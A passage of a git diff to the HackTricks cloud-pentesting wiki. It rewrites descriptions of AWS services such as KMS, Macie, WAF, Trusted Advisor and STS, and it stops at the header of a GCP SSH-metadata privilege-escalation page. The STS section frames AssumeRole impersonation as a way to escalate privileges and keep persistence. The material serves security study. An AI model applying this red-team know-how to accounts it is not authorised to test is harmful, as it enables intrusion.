Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md b/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md index f574b38b74..45f5f97c3f 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md @@ -16,9 +16,10 @@ Other ways to support HackTricks: ## KMS - Key Management Service -AWS Key Management Service (AWS KMS) is a managed service that makes it easy for you to **create and control customer master keys** (CMKs), the encryption keys used to encrypt your data. AWS KMS CMKs are generally **protected by hardware security modules** (HSMs). +AWS Key Management Service (AWS KMS) is presented as a managed service, simplifying the process for users to **create and manage customer master keys** (CMKs). These CMKs are integral in the encryption of user data. A notable feature of AWS KMS is that CMKs are predominantly **secured by hardware security modules** (HSMs), enhancing the protection of the encryption keys. + +KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** (for example, inside a S3). If you need to **encrypt information in transit** you need to use something like **TLS**. -KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** (for example, inside a S3). If you need to **encrypt information in transit** you need to use something like **TLS**.\ KMS is a **region specific service**. **Administrators at Amazon do not have access to your keys**. They cannot recover your keys and they do not help you with encryption of your keys. AWS simply administers the operating system and the underlying application it's up to us to administer our encryption keys and administer how those keys are used. diff --git a/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md b/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md index b9cdd8aefa..7de4a3e52c 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md @@ -16,7 +16,7 @@ Other ways to support HackTricks: ## Lambda -Amazon Web Services (AWS) Lambda is a compute service that lets you **run code without provisioning or managing servers**. Lambda **automatically manages the resources required** to run your code and provides high availability, scaling, and security features. With Lambda, **you only pay for the compute time that you consume**, and there are no upfront costs or long-term commitments. +Amazon Web Services (AWS) Lambda is described as a **compute service** that enables the execution of code without the necessity for server provision or management. It is characterized by its ability to **automatically handle resource allocation** needed for code execution, ensuring features like high availability, scalability, and security. A significant aspect of Lambda is its pricing model, where **charges are based solely on the compute time utilized**, eliminating the need for initial investments or long-term obligations. To call a lambda it's possible to call it as **frequently as you wants** (with Cloudwatch), **expose** an **URL** endpoint and call it, call it via **API Gateway** or even based on **events** such as **changes** to data in a **S3** bucket or updates to a **DynamoDB** table. diff --git a/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md b/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md index 3c9db800b1..7b83700fe1 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md @@ -14,21 +14,25 @@ Other ways to support HackTricks:
-## AWS - MQ +## Amazon MQ -**Message brokers** allow software systems, which often use different programming languages on various platforms, to communication and exchange information. **Amazon MQ** is a managed message broker service for **Apache ActiveMQ** and **RabbitMQ** that streamlines setup, operation, and management of message brokers on AWS. With a few steps, Amazon MQ can provision your message broker with support for software version upgrades. +### Introduction to Message Brokers +**Message brokers** serve as intermediaries, facilitating communication between different software systems, which may be built on varied platforms and programmed in different languages. **Amazon MQ** simplifies the deployment, operation, and maintenance of message brokers on AWS. It provides managed services for **Apache ActiveMQ** and **RabbitMQ**, ensuring seamless provisioning and automatic software version updates. ### AWS - RabbitMQ +RabbitMQ is a prominent **message-queueing software**, also known as a _message broker_ or _queue manager_. It's fundamentally a system where queues are configured. Applications interface with these queues to **send and receive messages**. Messages in this context can carry a variety of information, ranging from commands to initiate processes on other applications (potentially on different servers) to simple text messages. The messages are held by the queue-manager software until they are retrieved and processed by a receiving application. AWS provides an easy-to-use solution for hosting and managing RabbitMQ servers. -RabbitMQ is a **message-queueing software** also known as a _message broker_ or _queue manager._ Simply said; it is **software where queues are defined**, to which **applications connect** in order to **transfer a message** or messages. - -A message can include any kind of information. It could, for example, have information about a process or task that should start on another application (which could even be on another server), or it could be just a simple text message. The queue-manager software stores the messages until a receiving application connects and takes a message off the queue. The receiving application then processes the message. +### AWS - ActiveMQ +Apache ActiveMQ® is a leading open-source, Java-based **message broker** known for its versatility. It supports multiple industry-standard protocols, offering extensive client compatibility across a wide array of languages and platforms. Users can: -AWS offers to **host and manage in an easy way RabbitMQ servers**. +- Connect with clients written in JavaScript, C, C++, Python, .Net, and more. +- Leverage the **AMQP** protocol to integrate applications from different platforms. +- Use **STOMP** over websockets for web application message exchanges. +- Manage IoT devices with **MQTT**. +- Maintain existing **JMS** infrastructure and extend its capabilities. -### AWS - ActiveMQ +ActiveMQ's robustness and flexibility make it suitable for a multitude of messaging requirements. -Apache ActiveMQ® is the most popular open source, multi-protocol, Java-based **message broker**. It supports industry standard protocols so users get the benefits of client choices across a broad range of languages and platforms. Connect from clients written in JavaScript, C, C++, Python, .Net, and more. Integrate your multi-platform applications using the ubiquitous **AMQP** protocol. Exchange messages between your web applications using **STOMP** over websockets. Manage your IoT devices using **MQTT**. Support your existing **JMS** infrastructure and beyond. ActiveMQ offers the power and flexibility to support any messaging use-case. ## Enumeration diff --git a/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md b/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md index 4d97693e4a..5632c75f50 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md @@ -16,10 +16,10 @@ Other ways to support HackTricks: ## Amazon MSK -Amazon **Managed Streaming for Apache Kafka** (Amazon MSK) is a fully managed service that enables you to build and run applications that use **Apache Kafka to process streaming data**. Amazon MSK provides the control-plane operations, such as those for creating, updating, and deleting **clusters**.\ -It lets you use Apache **Kafka data-plane operations**, such as those for producing and consuming data. It runs **open-source versions of Apache Kafka**. This means existing applications, tooling, and plugins from partners and the **Apache Kafka community are supported** without requiring changes to application code. +**Amazon Managed Streaming for Apache Kafka (Amazon MSK)** is a service that is fully managed, facilitating the development and execution of applications processing streaming data through **Apache Kafka**. Control-plane operations, including creation, update, and deletion of **clusters**, are offered by Amazon MSK. +The service permits the utilization of Apache Kafka **data-plane operations**, encompassing data production and consumption. It operates on **open-source versions of Apache Kafka**, ensuring compatibility with existing applications, tooling, and plugins from both partners and the **Apache Kafka community**, eliminating the need for alterations in the application code. -Amazon MSK **detects and automatically recovers from the most common failure scenarios** for clusters so that your producer and consumer applications can continue their write and read operations with minimal impact. In addition, where possible, it **reuses the storage** from the older **broker** to **reduce the data that Apache Kafka needs to replicate.** +In terms of reliability, Amazon MSK is designed to **automatically detect and recover from prevalent cluster failure scenarios**, ensuring that producer and consumer applications persist in their data writing and reading activities with minimal disruption. Moreover, it aims to optimize data replication processes by attempting to **reuse the storage of replaced brokers**, thereby minimizing the volume of data that needs to be replicated by Apache Kafka. ### **Types** diff --git a/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md b/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md index 473e826ad5..1419aee286 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md @@ -16,13 +16,16 @@ Other ways to support HackTricks: ## AWS Secrets Manager -AWS Secrets Manager allows you to **remove any hard-coded secrets within your application and replacing them with a simple API call** to the aid of your secrets manager which then services the request with the relevant secret. As a result, AWS Secrets Manager acts as a **single source of truth for all your secrets across all of your applications**. +AWS Secrets Manager is designed to **eliminate the use of hard-coded secrets in applications by replacing them with an API call**. This service serves as a **centralized repository for all your secrets**, ensuring they are managed uniformly across all applications. -AWS Secrets Manager enables the **ease of rotating secrets** and therefore enhancing the security of that secret. An example of this could be your database credentials. Other secret types can also have automatic rotation enabled through the use of lambda functions, for example, API keys. +The manager simplifies the **process of rotating secrets**, significantly improving the security posture of sensitive data like database credentials. Additionally, secrets like API keys can be automatically rotated with the integration of lambda functions. -Access to your secrets within AWS Secret Manager is governed by fine-grained IAM identity-based policies in addition to resource-based policies. +The access to secrets is tightly controlled through detailed IAM identity-based policies and resource-based policies. -To allow a user form a different account to access your secret you need to authorize him to access the secret and also authorize him to decrypt the secret in KMS. The Key policy also needs to allows the external user to use it. +For granting access to secrets to a user from a different AWS account, it's necessary to: +1. Authorize the user to access the secret. +2. Grant permission to the user to decrypt the secret using KMS. +3. Modify the Key policy to allow the external user to utilize it. **AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.** diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md index 033cedf194..17942f0770 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md @@ -16,9 +16,10 @@ Other ways to support HackTricks: ## Detective -**Detective** makes it easy to **analyze, investigate, and quickly identify the root cause** of potential security issues or suspicious activities. Amazon Detective automatically **collects log data** from your AWS resources and uses **machine learning, statistical analysis, and graph theory** to build a linked set of data that enables you to easily conduct faster and more efficient security investigations. +**Amazon Detective** streamlines the security investigation process, making it more efficient to **analyze, investigate, and pinpoint the root cause** of security issues or unusual activities. It automates the collection of log data from AWS resources and employs **machine learning, statistical analysis, and graph theory** to construct an interconnected data set. This setup greatly enhances the speed and effectiveness of security investigations. + +The service eases in-depth exploration of security incidents, allowing security teams to swiftly understand and address the underlying causes of issues. Amazon Detective analyzes vast amounts of data from sources like VPC Flow Logs, AWS CloudTrail, and Amazon GuardDuty. It automatically generates a **comprehensive, interactive view of resources, users, and their interactions over time**. This integrated perspective provides all necessary details and context in one location, enabling teams to discern the reasons behind security findings, examine pertinent historical activities, and rapidly determine the root cause. -Amazon Detective **simplifies the process of digging deeper in security issues** by enabling your security teams to easily investigate and **quickly get to the root cause of a finding**. Amazon Detective can analyze trillions of events from multiple data sources such as Virtual Private Cloud (VPC) Flow Logs, AWS CloudTrail, and Amazon GuardDuty, and automatically creates a **unified, interactive view of your resources,** users, and the interactions between them over time. With this unified view, you can visualize all the details and context in one place to identify the underlying reasons for the findings, drill down into relevant historical activities, and quickly determine the root cause. ## References diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md index b9ae34a0be..789e510441 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md @@ -16,15 +16,15 @@ Other ways to support HackTricks: ## Firewall Manager -AWS Firewall Manager simplifies your administration and maintenance tasks across multiple accounts and resources for **AWS WAF, AWS Shield Advanced, Amazon VPC security groups, and AWS Network Firewall**. With Firewall Manager, you set up your AWS WAF firewall rules, Shield Advanced protections, Amazon VPC security groups, and Network Firewall firewalls just once. The service **automatically applies the rules and protections across your accounts and resources**, even as you add new resources. +**AWS Firewall Manager** streamlines the management and maintenance of **AWS WAF, AWS Shield Advanced, Amazon VPC security groups, and AWS Network Firewall** across multiple accounts and resources. It enables you to configure your firewall rules, Shield Advanced protections, VPC security groups, and Network Firewall settings just once, with the service **automatically enforcing these rules and protections across your accounts and resources**, including newly added ones. -It can **group and protect specific resources together**, for example, all resources with a particular tag or all of your CloudFront distributions. One key benefit of Firewall Manager is that it **automatically protects certain resources that are added** to your account as they become active. +The service offers the capability to **group and safeguard specific resources together**, like those sharing a common tag or all your CloudFront distributions. A significant advantage of Firewall Manager is its ability to **automatically extend protection to newly added resources** in your account. -**Requisites**: Created a Firewall Manager Master Account, setup an AWS organization and have added our member accounts and enable AWS Config. +**Prerequisites** include setting up a Firewall Manager Master Account, establishing an AWS organization with member accounts, and enabling AWS Config. -A **rule group** (a set of WAF rules together) can be added to an AWS Firewall Manager Policy which is then associated to AWS resources, such as your cloudfront distributions or application load balances. +A **rule group** (a collection of WAF rules) can be incorporated into an AWS Firewall Manager Policy, which is then linked to specific AWS resources such as CloudFront distributions or application load balancers. -**Firewall Manager policies only allow "Block" or "Count"** options for a rule group (no "Allow" option). +It's important to note that **Firewall Manager policies permit only "Block" or "Count" actions** for a rule group, without an "Allow" option. ## Enumeration @@ -58,6 +58,9 @@ aws fms list-admin-accounts-for-organization # ReadOnly policy is not enough for TODO, PRs accepted +# References +* [https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html](https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md index 1824cd578f..cd69cfe290 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md @@ -14,86 +14,72 @@ Other ways to support HackTricks:
-## Macie +# Macie -The main function of the service is to provide an automatic method of **detecting, identifying, and also classifying data** that you are storing within your AWS account. +Amazon Macie stands out as a service designed to **automatically detect, classify, and identify data** within an AWS account. It leverages **machine learning** to continuously monitor and analyze data, primarily focusing on detecting and alerting against unusual or suspicious activities by examining **cloud trail event** data and user behavior patterns. -The service is backed by **machine learning**, allowing your data to be actively reviewed as different actions are taken within your AWS account. Machine learning can spot access patterns and **user behavior** by analyzing **cloud trail event** data to **alert against any unusual or irregular activity**. Any findings made by Amazon Macie are presented within a dashboard which can trigger alerts, allowing you to quickly resolve any potential threat of exposure or compromise of your data. +Key Features of Amazon Macie: -Amazon Macie will automatically and continuously **monitor and detect new data that is stored in Amazon S3**. Using the abilities of machine learning and artificial intelligence, this service has the ability to familiarize over time, access patterns to data.\ -Amazon Macie also uses natural language processing methods to **classify and interpret different data types and content**. NLP uses principles from computer science and computational linguistics to look at the interactions between computers and the human language. In particular, how to program computers to understand and decipher language data. The **service can automatically assign business values to data that is assessed in the form of a risk score**. This enables Amazon Macie to order findings on a priority basis, enabling you to focus on the most critical alerts first. In addition to this, Amazon Macie also has the added benefit of being able to **monitor and discover security changes governing your data**. As well as identify specific security-centric data such as access keys held within an S3 bucket. +1. **Active Data Review**: Employs machine learning to review data actively as various actions occur within the AWS account. +2. **Anomaly Detection**: Identifies irregular activities or access patterns, generating alerts to mitigate potential data exposure risks. +3. **Continuous Monitoring**: Automatically monitors and detects new data in Amazon S3, employing machine learning and artificial intelligence to adapt to data access patterns over time. +4. **Data Classification with NLP**: Utilizes natural language processing (NLP) to classify and interpret different data types, assigning risk scores to prioritize findings. +5. **Security Monitoring**: Identifies security-sensitive data, including API keys, secret keys, and personal information, helping to prevent data leaks. -This protective and proactive security monitoring enables Amazon Macie to **identify critical, sensitive, and security focused data such as API keys, secret keys, in addition to PII (personally identifiable information) and PHI data**. +Amazon Macie is a **regional service** and requires the 'AWSMacieServiceCustomerSetupRole' IAM Role and an enabled AWS CloudTrail for functionality. -This is useful to avoid data leaks as Macie will detect if you are exposing people information to the Internet. +## Alert System -It's a **regional service**. +Macie categorizes alerts into predefined categories like: -It requires the existence of IAM Role 'AWSMacieServiceCustomerSetupRole' and it needs AWS CloudTrail to be enabled. +- Anonymized access +- Data compliance +- Credential Loss +- Privilege escalation +- Ransomware +- Suspicious access, etc. -Pre-defined alerts categories: +These alerts provide detailed descriptions and result breakdowns for effective response and resolution. -* Anonymized access -* Config compliance -* Credential Loss -* Data compliance -* Files hosting -* Identity enumeration -* Information loss -* Location anomaly -* Open permissions -* Privilege escalation -* Ransomware -* Service disruption -* Suspicious access +## Dashboard Features -The **alert summary** provides detailed information to allow you to respond appropriately. It has a description that provides a deeper level of understanding of why it was generated. It also has a breakdown of the results. +The dashboard categorizes data into various sections, including: -The user has the possibility to create new custom alerts. +- S3 Objects (by time range, ACL, PII) +- High-risk CloudTrail events/users +- Activity Locations +- CloudTrail user identity types, and more. -**Dashboard categorization**: +## User Categorization -* S3 Objects for selected time range -* S3 Objects -* S3 Objects by PII - Personally Identifiable Information -* S3 Objects by ACL -* High-risk CloudTrail events and associated users -* High-risk CloudTrail errors and associated users -* Activity Location -* CloudTrail Events -* Activity ISPs -* CloudTrail user identity types +Users are classified into tiers based on the risk level of their API calls: -**User Categories**: Macie categorises the users in the following categories: +- **Platinum**: High-risk API calls, often with admin privileges. +- **Gold**: Infrastructure-related API calls. +- **Silver**: Medium-risk API calls. +- **Bronze**: Low-risk API calls. -* **Platinum**: Users or roles considered to be making high risk API calls. Often they have admins privileges. You should monitor the pretty god in case they are compromised -* **Gold**: Users or roles with history of calling APIs related to infrastructure changes. You should also monitor them -* **Silver**: Users or roles performing medium level risk API calls -* **Bronze**: Users or roles using lowest level of risk based on API calls +## Identity Types -**Identity types:** +Identity types include Root, IAM user, Assumed Role, Federated User, AWS Account, and AWS Service, indicating the source of requests. -* Root: Request made by root user -* IAM user: Request made by IAM user -* Assumed Role: Request made by temporary assumed credentials (AssumeRole API for STS) -* Federated User: Request made using temporary credentials (GetFederationToken API fro STS) -* AWS Account: Request made by a different AWS account -* AWS Service: Request made by an AWS service +## Data Classification -**Data classification**: 4 file classifications exists: +Data classification encompasses: -* Content-Type: list files based on content-type detected. The given risk is determined by the type of content detected. -* File Extension: Same as content-type but based on the extension -* Theme: Categorises based on a series of keywords detected within the files -* Regex: Categories based on specific regexps +- Content-Type: Based on detected content type. +- File Extension: Based on file extension. +- Theme: Categorized by keywords within files. +- Regex: Categorized based on specific regex patterns. -The final risk of a file will be the highest risk found between those 4 categories +The highest risk among these categories determines the file's final risk level. -The research function allows to create you own queries again all Amazon Macie data and perform a deep dive analysis of the data. You can filter results based on: CloudTrail Data, S3 Bucket properties and S3 Objects +## Research and Analysis -It possible to invite other accounts to Amazon Macie so several accounts share Amazon Macie. +Amazon Macie's research function allows for custom queries across all Macie data for in-depth analysis. Filters include CloudTrail Data, S3 Bucket properties, and S3 Objects. Moreover, it supports inviting other accounts to share Amazon Macie, facilitating collaborative data management and security monitoring. -### Enumeration + +## Enumeration ``` # Get buckets @@ -137,6 +123,9 @@ However, maybe an attacker could also be interested in disrupting it in order to TODO: PRs are welcome! +# References +* [https://cloudacademy.com/blog/introducing-aws-security-hub/](https://cloudacademy.com/blog/introducing-aws-security-hub/) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md index 49f66fee7b..d37483012c 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md @@ -14,22 +14,26 @@ Other ways to support HackTricks:
-## Trusted Advisor +# AWS Trusted Advisor Overview -The main function of Trusted Advisor is to **recommend improvements across your AWS account** to help optimize and hone your environment based on **AWS best practices**. These recommendations cover four distinct categories. It's a is a **cross-region service**. +Trusted Advisor is a service that **provides recommendations** to optimize your AWS account, aligning with **AWS best practices**. It's a service that operates across multiple regions. Trusted Advisor offers insights in four primary categories: -1. **Cost optimization:** which helps to identify ways in which you could **optimize your resources** to save money. -2. **Performance:** This scans your resources to highlight any **potential performance issues** across multiple services. -3. **Security:** This category analyzes your environment for any **potential security weaknesses** or vulnerabilities. -4. **Fault tolerance:** Which suggests best practices to **maintain service operations** by increasing resiliency should a fault or incident occur across your resources. +1. **Cost Optimization:** Suggests how to restructure resources to reduce expenses. +2. **Performance:** Identifies potential performance bottlenecks. +3. **Security:** Scans for vulnerabilities or weak security configurations. +4. **Fault Tolerance:** Recommends practices to enhance service resilience and fault tolerance. -The full power and potential of AWS Trusted Advisor is only really **available if you have a business or enterprise support plan with AWS**. **Without** either of these plans, then you will only have access to **six core checks** that are freely available to everyone. These free core checks are split between the performance and security categories, with the majority of them being related to security. These are the 6 checks: service limits, Security Groups Specific Ports Unrestricted, Amazon EBS Public Snapshots, Amazon RDS Public Snapshots, IAM Use, and MFA on root account.\ -Trusted advisor can send notifications and you can exclude items from it.\ -Trusted advisor data is **automatically refreshed every 24 hours**, **but** you can perform a **manual one 5 mins after the previous one.** +The comprehensive features of Trusted Advisor are exclusively accessible with **AWS business or enterprise support plans**. Without these plans, access is limited to **six core checks**, primarily focused on performance and security. -### **Checks** +## Notifications and Data Refresh -#### CategoriesCore +- Trusted Advisor can issue alerts. +- Items can be excluded from its checks. +- Data is refreshed every 24 hours. However, a manual refresh is possible 5 minutes after the last refresh. + +## **Checks Breakdown** + +### CategoriesCore 1. Cost Optimization 2. Security @@ -38,7 +42,9 @@ Trusted advisor data is **automatically refreshed every 24 hours**, **but** you 5. Service Limits 6. S3 Bucket Permissions -#### Core Checks +### Core Checks + +Limited to users without business or enterprise support plans: 1. Security Groups - Specific Ports Unrestricted 2. IAM Use @@ -47,24 +53,29 @@ Trusted advisor data is **automatically refreshed every 24 hours**, **but** you 5. RDS Public Snapshots 6. Service Limits -#### Security Checks - -* Security group open access to specific high-risk ports -* Security group unrestricted access -* Open write and List access to S3 buckets -* MFA on root account -* Overly permissive RDS security group -* Use of cloudtrail -* Route 53 MX records have SPF records -* ELB with poor or missing HTTPS config -* ELB security groups missing or overly permissive -* CloudFront cert checks - expired, weak, misconfigured -* IAM access keys not rotated in last 90 days -* Exposed access keys on GitHub etc -* Public EBS or RDS snapshots -* Missing or weak IAM password policy - -## **References** +### Security Checks + +A list of checks primarily focusing on identifying and rectifying security threats: + +- Security group settings for high-risk ports +- Security group unrestricted access +- Open write/list access to S3 buckets +- MFA enabled on root account +- RDS security group permissiveness +- CloudTrail usage +- SPF records for Route 53 MX records +- HTTPS configuration on ELBs +- Security groups for ELBs +- Certificate checks for CloudFront +- IAM access key rotation (90 days) +- Exposure of access keys (e.g., on GitHub) +- Public visibility of EBS or RDS snapshots +- Weak or absent IAM password policies + +AWS Trusted Advisor acts as a crucial tool in ensuring the optimization, performance, security, and fault tolerance of AWS services based on established best practices. + + +# **References** * [https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor](https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor) diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md index 6ec6fdfa5a..fcb589ff8c 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md @@ -14,42 +14,45 @@ Other ways to support HackTricks:
-## WAF +# AWS WAF -AWS WAF is a **web application firewall** that helps **protect your web applications** or APIs against common web exploits that may affect availability, compromise security, or consume excessive resources. AWS WAF gives you control over **how traffic reaches your applications** by enabling you to create **security rules that block common attack patterns**, such as SQL injection or cross-site scripting, and rules that filter out specific traffic patterns you define. +AWS WAF is a **web application firewall** designed to **safeguard web applications or APIs** against various web exploits which may impact their availability, security, or resource consumption. It empowers users to control incoming traffic by setting up **security rules** that mitigate typical attack vectors like SQL injection or cross-site scripting and also by defining custom filtering rules. -### Conditions +## Monitoring Criteria (Conditions) -Conditions allow you to specify **what elements of the incoming HTTP or HTTPS request you want WAF to be monitoring** (XSS, GEO - filtering by location-, IP address, Size constraints, SQL Injection attacks, strings and regex matching). Note that if you are restricting a country from cloudfront, this request won't arrive to the waf. +Conditions specify the elements of incoming HTTP/HTTPS requests that AWS WAF monitors, which include XSS, geographical location (GEO), IP addresses, Size constraints, SQL Injection, and patterns (strings and regex matching). It's important to note that requests restricted at the CloudFront level based on country won't reach WAF. -You can have **100 conditions of each type**, such as Geo Match or size constraints, however **Regex** is the **exception** to this rule where **only 10 Regex** conditions are allowed but this limit is possible to increase. You are able to have **100 rules and 50 Web ACLs per AWS account**. You are limited to **5 rate-based-rules** per account. Finally you can have **10,000 requests per second** when **using WAF** within your application load balancer. +Each AWS account can configure: +- **100 conditions** for each type (except for Regex, where only **10 conditions** are allowed, but this limit can be increased). +- **100 rules** and **50 Web ACLs**. +- A maximum of **5 rate-based rules**. +- A throughput of **10,000 requests per second** when WAF is implemented with an application load balancer. -### Rules +## Rule Configuration -Using these conditions you can create rules: For example, block request if 2 conditions are met.\ -When creating your rule you will be asked to select a **Rule Type**: **Regular Rule** or **Rate-Based Rule**. +Rules are crafted using the specified conditions. For instance, a rule might block a request if it meets 2 specific conditions. There are two types of rules: -The only **difference** between a rate-based rule and a regular rule is that **rate-based** rules **count** the **number** of **requests** that are being received from a particular IP address over a time period of **five minutes**. +1. **Regular Rule**: Standard rule based on specified conditions. +2. **Rate-Based Rule**: Counts requests from a specific IP address over a five-minute period. Here, users define a threshold, and if the number of requests from an IP exceeds this limit within five minutes, subsequent requests from that IP are blocked until the request rate drops below the threshold. The minimum threshold for rate-based rules is **2000 requests**. -When you select a rate-based rule option, you are asked to **enter the maximum number of requests from a single IP within a five minute time frame**. When the count limit is **reached**, **all other requests from that same IP address is then blocked**. If the request rate falls back below the rate limit specified the traffic is then allowed to pass through and is no longer blocked. When setting your rate limit it **must be set to a value above 2000**. Any request under this limit is considered a Regular Rule. +## Actions -### Actions +Actions are assigned to each rule, with options being **Allow**, **Block**, or **Count**: -An action is applied to each rule, these actions can either be **Allow**, **Block** or **Count**. +- **Allow**: The request is forwarded to the appropriate CloudFront distribution or Application Load Balancer. +- **Block**: The request is terminated immediately. +- **Count**: Tallies the requests meeting the rule's conditions. This is useful for rule testing, confirming the rule's accuracy before setting it to Allow or Block. -* When a request is **allowed**, it is **forwarded** onto the relevant CloudFront distribution or Application Load Balancer. -* When a request is **blocked**, the request is **terminated** there and no further processing of that request is taken. -* A **Count** action will **count the number of requests that meet the conditions** within that rule. This is a really good option to select when testing the rules to ensure that the rule is picking up the requests as expected before setting it to either Allow or Block. +If a request doesn't match any rule within the Web ACL, it undergoes the **default action** (Allow or Block). The order of rule execution, defined within a Web ACL, is crucial and typically follows this sequence: -If an **incoming request does not meet any rule** within the Web ACL then the request takes the action associated to a **default action** specified which can either be **Allow** or **Block**. An important point to make about these rules is that they are **executed in the order that they are listed within a Web ACL**. So be careful to architect this order correctly for your rule base, **typically** these are **ordered** as shown: +1. Allow Whitelisted IPs. +2. Block Blacklisted IPs. +3. Block requests matching any detrimental signatures. -1. WhiteListed IPs as Allow. -2. BlackListed IPs Block -3. Any Bad Signatures also as Block. +## CloudWatch Integration -### CloudWatch +AWS WAF integrates with CloudWatch for monitoring, offering metrics like AllowedRequests, BlockedRequests, CountedRequests, and PassedRequests. These metrics are reported every minute by default and retained for a period of two weeks. -WAF CloudWatch metrics are reported **in one minute intervals by default** and are kept for a two week period. The metrics monitored are AllowedRequests, BlockedRequests, CountedRequests, and PassedRequests. ## Enumeration @@ -87,6 +90,9 @@ However, an attacker could also be interested in disrupting this service so the TODO: PRs are welcome +# References +* https://www.citrusconsulting.com/aws-web-application-firewall-waf/#:~:text=Conditions%20allow%20you%20to%20specify,user%20via%20a%20web%20application. +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md b/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md index ea3d5d4f1e..5ed7899ea1 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md @@ -16,15 +16,16 @@ Other ways to support HackTricks: ## STS -AWS provides AWS **Security Token Service (AWS STS)** as a web service that enables you to **request** temporary, limited-privilege **credentials** for **AWS Identity and Access Management** (IAM) users or for users you authenticate (federated users). +**AWS Security Token Service (STS)** is primarily designed to issue **temporary, limited-privilege credentials**. These credentials can be requested for **AWS Identity and Access Management (IAM)** users or for authenticated users (federated users). -As the nature of the STS service is to **provide credentials to impersonate identities**, this service, eve if don't have a lot of options, will be very useful to **escalate privileges and obtain persistence**. +Given that STS's purpose is to **issue credentials for identity impersonation**, the service is immensely valuable for **escalating privileges and maintaining persistence**, even though it might not have a wide array of options. ### Assume Role Impersonation -The [AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API\_AssumeRole.html) action from AWS STS is what allows a principal to request credentials for another principal to impersonate him. When calling it, it returns an access key ID, secret key, and a session token for the specified ARN. +The action [AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API\_AssumeRole.html) provided by AWS STS is crucial as it permits a principal to acquire credentials for another principal, essentially impersonating them. Upon invocation, it responds with an access key ID, a secret key, and a session token corresponding to the specified ARN. + +For Penetration Testers or Red Team members, this technique is instrumental for privilege escalation (as elaborated [**here**](../aws-privilege-escalation/aws-sts-privesc.md#sts-assumerole)). However, it's worth noting that this technique is quite conspicuous and may not catch an attacker off guard. -As a Penetration Tester or Red Teamer, this technique is useful to privesc (as explained [**here**](../aws-privilege-escalation/aws-sts-privesc.md#sts-assumerole)), but it's the most obvious technique to privesc, so it won't caught the attacker by surprise. #### Assume Role Logic diff --git a/pentesting-cloud/gcp-pentesting/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md b/pentesting-cloud/gcp-pentesting/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md index fbe0dc654a..991d349c0e 100644 --- a/pentesting-cloud/gcp-pentesting/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md +++ 